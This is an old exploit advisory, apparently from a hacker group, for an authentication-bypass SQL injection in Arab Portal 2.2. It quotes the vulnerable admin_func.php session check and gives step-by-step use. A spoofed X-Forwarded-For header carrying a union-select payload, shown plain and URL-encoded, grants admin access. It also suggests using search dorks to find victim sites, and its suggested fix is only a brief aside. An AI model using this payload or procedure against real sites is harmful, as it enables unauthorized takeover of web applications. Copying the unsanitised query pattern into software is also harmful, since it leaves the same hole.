Arab Portal 2.2 (Auth Bypass) Remote SQL Injection Vulnerability
2009-05-29 06:34:41-==========================================[ ViVa Crazy Coderz rxh - S.C.T ]====================================-
# Script Name : Arab portal 2.2 Remote Auth SQL Bypass Vulnerabilitiy
# Script home : http://www.arab-portal.info/arabportal_22.zip
# Exploit risk level : High
# Found By : RoMaNcYxHaCkEr [RXH]
# Written By : Sniper Code [S.C.T - 443 ]
# Our home : WwW.Sec-Code.CoM [Security - Codes TeaM]
+======================================================================================================================+
# Introduction About Vulne :
the Control Panel Is Depending on Session In MySQL Also By Cookies But by Default it Is Session ...
See This Line 192 of this File [admin/aclass/admin_func.php]:
$result = $apt->query("SELECT sessIP from rafia_admin_sess where sessID='$sessID' and sessIP='$sessIP' and sess_TIME<'$expsess'");
When You Injected The Header To Get XPL SQL Injection By Simple Injected And Success The Login In This SQL Query
# Vulne Line 192 In File [admin/aclass/admin_func.php]: :
function is_login()
{
global $apt;
$sessID = $this->get_sessID();
$sessIP = $apt->ip;
$expsess = $apt->time + $this->expsess;
if($this->use_pre_ip == 1){$r_ip = explode('.',$sessIP); $sessIP = $r_ip[0].'.'.$r_ip[1].'.'.$r_ip[2];}
$result = $apt->query("SELECT sessIP from rafia_admin_sess where sessID='$sessID' and sessIP='$sessIP' and sess_TIME<'$expsess'");
if ($apt->dbnumrows($result) > 0)
{
$apt->query("update rafia_admin_sess set sess_TIME='".$apt->time."' where sessID='$sessID'");
return true;
}
else
{
return false;
}
}
we can exploit this . .
# and now the Exploit is:
-First : Install This Tool :
https://addons.mozilla.org/en-US/firefox/addon/5948
it is [ X-Forwarded-For Spoofer tool]
You Can Inject Also Client-ip Also Is Infected In Header
-second : find site by using dork : plz use your mind ^_^
ok now Go To Admincp e.g. :
http://localhost/arabportal_22/admin/
http://sniper code/path/admin/
Then Write This Code In Tool [from Firefox ===> Tools====> X-Forwarded-for Spoofer]
put this code :
'/**/union/**/select/**/0/*
And select Enable for tool . . .
Now Refresh Twice ..and you will be In admin Control Panel ^_^
I Am Tired For Written Exploit For This Bug ...
and You Can Code It,s . .
If You Have Problem With Magic_quat in php version Encode To URL Like This :
%27%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%30%2F%2A
and also you will be in admin control panel. . . .
+================================================================================================================+
# Solution :
Protect The Admin cp By using Firewall Or Change The Login Manner :)
thats it . . .
[+]
done by :sniper code and rxh . .
[+] Greetz to :
[»] The members in our home [ WwW.Sec-Code.CoM - - ]
[»] [Snake1095 - aLwHEeD - AlH7nOOtY - aB0-3tH4b T3rR0r - HXH - -]
[»][MN9 - S4S-T3rr0r!sT -G0D-F4Th3r- SnIpEr_h - Cyb3R-1sT - siana - jiko - -]
[+] [members of WwW.tryag.cc/cc - -]
-==========================================[ ViVa Crazy Coderz rxh - S.C.T ]====================================-
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.